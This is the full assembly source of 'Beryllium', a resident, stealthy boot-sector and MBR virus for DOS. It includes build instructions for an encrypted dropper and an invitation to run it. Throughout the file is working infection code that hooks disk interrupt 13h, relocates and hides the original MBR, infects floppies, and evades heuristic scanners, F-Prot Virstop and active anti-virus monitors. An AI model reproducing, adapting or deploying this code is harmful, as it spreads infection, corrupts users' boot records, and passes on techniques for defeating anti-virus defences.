;============================================================================= ; Virus Name: Beryllium ; ; Notes: ; - resident, stealth, boot sector/MBR infector ; - places only 22 bytes of benign code in a boot sector or MBR ; thereby totally avoiding heuristic alarms even when the virus ; is not resident to provide stealth ; - resident virus not detected by F-Prot Virstop due to a ; "password" located at installed virus offset 102h ; - detects the presence of A-V monitors and deactivates while ; they are present ; - MBR and floppy boot sector stealth ; - post-infection MBR write protection ; - functionally infects all floppy formats in drives A and B ; ; To Compile: ; - use shareware A86 assembler ; - type "a86 berylium.a86" ; - run the berylium.com file ; - encrypted dropper is produced as "dropbery.com" ; - if you desire to infect your system, run dropbery.com ;============================================================================= boot equ 06ad ;delta offset for boot location drop equ 041 ;delta offset for drop of virus res equ 0153 ;delta offset for resident location oldlength equ 016 ;infection code length (boot sector) virus_tag1 equ 0c033 ;infection tag (main body code) virus_tag2 equ 0ea ;infection tag (boot sector code) ;----------------------------------------------------------------------------- ; Encrypt - encrypts dropper and creates dropper file ;----------------------------------------------------------------------------- encrypt: mov bx,offset dropper ;starting point for encryption mov cl,04 ;set shift/rotate count scramble_it: mov ax,[bx] ;move target word into ax rol ax,cl ;rotate word left "cl" positions mov [bx],ax ;move word back to memory inc bx ;point to next byte cmp bx,offset MBR_buffer-2 ;end of code to encrypt? jbe scramble_it ;if not, do it again mov ah,03c ;create file function xor cx,cx ;attribute = 0 = read/write mov dx,offset file_name ;point to ASCIIZ file name string int 021 ;create file jc exit_encrypt ;if flag=fail, exit mov bx,ax ;load bx with new file's handle mov ah,040 ;write to file with handle mov cx,droplength ;number of bytes to write mov dx,offset decrypt ;pointer to data to write int 021 ;write encrypted dropper jc exit_encrypt ;if flag=fail, exit mov ah,03e ;close file int 021 exit_encrypt: mov ax,04c00 ;terminate w/return code int 021 ;terminate program file_name db "dropbery.com",0 ;ASCIIZ dropper file name ;----------------------------------------------------------------------------- ; Decrypt - decrypts dropper using a method not currently recognized as ; hostile by heuristic scanners ;----------------------------------------------------------------------------- decrypt: mov bx,offset MBR_buffer-drop-2 ;starting point for decryption mov cl,04 ;set shift/rotate count unscramble_it: mov ax,[bx] ;move target word into ax ror ax,cl ;rotate word right "cl" positions mov [bx],ax ;move word back to memory dec bx ;point to next byte cmp bx,offset dropper-drop ;end of code to decrypt? jae unscramble_it ;if not, do it again ;----------------------------------------------------------------------------- ; Dropper - infects MBR if not already infected and if no A-V monitor program ; is present ;----------------------------------------------------------------------------- dropper: push ds ;preserve ds xor ax,ax ;zero ax mov ds,ax ;point data seg. to interrupt vector ; table cmp byte ptr [040*4+3],0c0 ;int40 segment pointing to ROM? pop ds ;restore ds jb exit_dropper ;if not, do not attempt to infect MBR mov ah,035 ;load ah with installation check byte int 013 ;check for installed virus cmp al,ah ;al = ah? je exit_dropper ;if so, already installed, so MBR must ; already be infected drop_it: mov ax,0201 ;select read-one-sector function mov bx,offset MBR_buffer-drop ;set load offset mov cx,02 ;cylinder 0, sector 2 mov dx,080 ;fixed disk 0 (C) int 013 ;load to buffer jc exit_dropper ;if flag=fail, exit cmp word ptr [bx+070],virus_tag1 ;beryllium code present? je exit_dropper ;if so, exit dropper mov cx,virlength ;set move count mov si,offset beryllium-drop ;set source address of virus code lea di,[bx+070] ;set destination within buffer rep movsb ;infect sector in memory mov ax,0301 ;write infected sector to mov cl,02 ; cylinder 0, sector 2 int 013 jc exit_dropper ;if flag=fail, exit mov ax,0201 ;read original MBR dec cx ; from cylinder 0, sector 1 int 013 jc exit_dropper ;if flag=fail, exit mov ax,0301 ;write original MBR mov cl,03 ; to cylinder 0, sector 3 int 013 jc exit_dropper ;if flag=fail, exit mov byte ptr [offset head-drop],dh ;save location (head & mov byte ptr [offset sector-drop],02 ; sector) of virus in MBR's ; viral bootstrap code mov cx,oldlength ;set number of bytes to move mov si,offset newbytes-drop ;set source address of infection code mov di,bx ;set destination to MBR in memory cld ;clear direction flag (fwd) rep movsb ;infect MBR with bootstrap code mov ax,0301 ;write infected MBR to inc cx ; cylinder 0, sector 1 int 013 exit_dropper: mov ax,04c00 ;terminate w/return code int 021 ;terminate program ;----------------------------------------------------------------------------- ; Beryllium - main body of virus, executes at boot, infects MBR if boot is ; from floppy and MBR is not infected, installs virus in memory if not ; installed ;----------------------------------------------------------------------------- beryllium: xor ax,ax ;zero ax mov ds,ax ;set ds = 0 cli ;clear interrupts mov ss,ax ;set ss = 0 mov bx,07c00 ;set bx to boot code offset mov sp,bx ;ditto for sp sti ;set interrupts cmp dl,080 ;is this a hard drive boot? jne floppy_boot ;if not, jump to check/infect MBR mov ax,0201 ;if so, load orignal MBR to 7c00h mov cx,03 ;cylinder 0, sector 3 int 013 ;do it jmp short install ;install virus in memory floppy_boot: mov si,offset oldbytes+boot ;load source offset of original bytes mov di,07c3e ;load destination in boot sector code mov cx,oldlength ;set number of bytes to move push cx ;save it for later cld ;clear direction (fwd) rep movsb ;restore original bytes to boot sector ;in memory mov ax,0201 ;select read-one-sector function mov bh,06 ;set load offset inc cx ;cylinder 0, sector 1 (MBR) mov dx,080 ;fixed disk 0 (C) int 013 ;load MBR to 0:0600h cmp byte ptr [0611],virus_tag2 ;MBR infected? je install ;if so, install virus in memory mov ax,0301 ;if not, save orig. MBR mov cx,03 ;at cylinder 0, sector 3 int 013 ;write MBR mov byte ptr [offset head+boot],dh ;save location (head & mov byte ptr [offset sector+boot],02 ; sector) of virus in MBR's ; viral bootstrap code pop cx ;set number of bytes to move mov si,offset newbytes+boot ;set source address of infection code mov di,bx ;set destination to MBR in memory rep movsb ;infect MBR mov ax,0302 ;select write-two-sectors function inc cx ;cylinder 0, sector 1 int 013 ;write infected MBR to sector 1 and ;continuation of virus to sector 2 install: mov ah,035 ;load ah with installation check byte int 013 ;check for installed virus cmp al,ah ;al = ah? je exec_boot ;if so, already installed, so jump to ; execute boot code in memory dec word ptr [0413] ;lower top-of-mem by 1KB int 012 ;get conventional memory count in #KB mov cx,0106 ;load move and shift values shl ax,cl ;calculate segment for virus residence mov es,ax ;load es with destination segment xchg [013*4+2],ax ;steal int13 segment mov [offset old13+boot+2],ax ;store original segment in virus mov ax,offset int13-res ;load res. off. of virus int13 xchg [013*4],ax ;steal int13 offset mov [offset old13+boot],ax ;store original offset in virus mov si,0870 ;set source offset mov di,0070 ;set destination offset rep movsw ;move virus to es:0h (9fc0:0000h in ; system w/640K conventional memory) exec_boot: jmp 0000:07c00 ;execute boot code ;----------------------------------------------------------------------------- ; Int13 - responds to installation check from dropper and boot routines, ; provides MBR stealth and write-protection, infects floppy if not already ; infected and if no A-V monitor is present, provides floppy stealth ;----------------------------------------------------------------------------- chain_int13: pop ds ;restore registers pop di pop si jmp short virstop db 078,078 ;Virstop "password" virstop: db 0ea ;"jmp far" to location specified in ; old13 old13 dw ?, ? ;offset and segment of original int13 ; handler int13: cmp ah,035 ;installation check? jne MBR_stealth ;if not, continue mov al,ah ;if so, put ah in al for confirmation iret ; and return MBR_stealth: push si ;preserve registers push di push ds cmp cx,01 ;track 0, sector 1? jne chain_int13 ;if not, we're not interested cmp dx,080 ;head 0, fixed disk 0? ja chain_int13 ;if above, exit jb infect_floppy ;if below, must be floppy access cmp ah,03 ;write to fixed disk MBR? je sim_IO ;if so, simulate write mov cl,03 ;point to relocated original MBR call bios_int13 ;load it to disk I/O buffer mov cl,01 ;restore cl to point to sector 1 sim_IO: xor ah,ah ;clear ah and carry flag to simulate clc ; succcessful write exit_int13: pop ds ;restore registers pop di pop si retf 02 ;return to calling routine infect_floppy: cmp ah,02 ;read request? jne chain_int13 ;if not, exit cmp dl,01 ;floppy drive 'A' or 'B'? ja chain_int13 ;if not, exit call bios_int13 ;read boot sector jc exit_int13 ;if flag=fail, exit to retry cmp byte ptr es:[bx+04f],virus_tag2 ;boot sector infected? je floppy_stealth ;if so, hide infection xor cx,cx ;zero cx mov ds,cx ;point ds to system vector table cmp byte ptr [040*4+3],0c0 ;int40 pointing to ROM? jb floppy_stealth ;if not, do not infect boot sector push bx ;preserve registers push es push es pop ds ;set ds = es push cs pop es ;set es = cs lea si,[bx+03e] ;set source offset to boot sector mov di,offset oldbytes-res ;set destination to code storage mov cx,oldlength ;set number of bytes to move/save push cx ;save that number for later cld ;clear direction flag (fwd) rep movsb ;store original boot code in virus mov [bx],03ceb ;put jump at start of boot code mov al,byte ptr [bx+016] ;load # sectors/FAT from BPB mul byte ptr [bx+010] ;multiply by number of FATs inc ax ;add boot sector to count push ax ;save it for later mov ax,[bx+011] ;load max. # of files from BPB mov cl,04 ;divide by 16 to get # of root shr ax,cl ; directory sectors pop cx ;pop boot sector + FAT sector count add cx,ax ;add # of directory sectors sub cx,[bx+018] ;subtract # of sectors per track ; to get target sector number inc dh ;specify head 1 mov cs:byte ptr [offset head-res],dh ;set newbytes head/sector mov cs:byte ptr [offset sector-res],cl ; values to point to virus mov ax,0301 ;select write-one-sector function xor bx,bx ;set offset to point to virus call bios_int13 ;write virus to last root directory ; sector pop cx ;restore registers pop es pop bx push cs pop ds ;set ds = cs mov si,offset newbytes-res ;point to infection code lea di,[bx+03e] ;set destination to boot sector code rep movsb ;infect boot sector in memory mov ax,0301 ;select write-one-sector function inc cx ;track 0, sector 1 dec dh ;head 0, drive "dl" call bios_int13 ;write infected boot sector floppy_stealth: push cs pop ds ;set ds = cs mov si,offset oldbytes-res ;point to stored original boot code lea di,[bx+03e] ;set destination to boot sector mov cx,oldlength ;set number of bytes to move cld ;clear direction flag (fwd) rep movsb ;restore original bytes in memory inc cx ;restore cx to 0001h jmp short sim_IO ;return sanitized boot sector to ; calling routine bios_int13: pushf ;push flags cs: call dword ptr [offset old13-res] ;call original int13 handler ret ;----------------------------------------------------------------------------- ; Newbytes - the only viral code that actually resides in the boot sector or ; MBR. Its purpose is simply to load the main body of the virus to 0000:0800 ; and to transfer control to it. This is the only area that would need to be ; modified to avoid anti-viral scan string detection. ;----------------------------------------------------------------------------- newbytes: xor ax,ax ;zero ax mov es,ax ;set es = 0 mov ax,0201 ;select read-one-sector function mov bx,0800 ;set disk I/O buffer offset db 0b9 ;"mov cx,00xx" sector db ? ;sector number (xx) db 00 ;track 0 db 0b6 ;"mov dh,xx" head db ? ;head number (xx) int 013 ;load virus to 0000:0800h jmp 0000:0870 ;jump to execute virus code oldbytes: db oldlength dup ? ;storage location for original first ; 22d bytes of the boot sector db 0,0,'BERYLLIUM!',0,0 ;credits MBR_buffer: droplength equ offset MBR_buffer - offset decrypt virlength equ offset MBR_buffer - offset beryllium decryptlength equ offset MBR_buffer - offset dropper end beryllium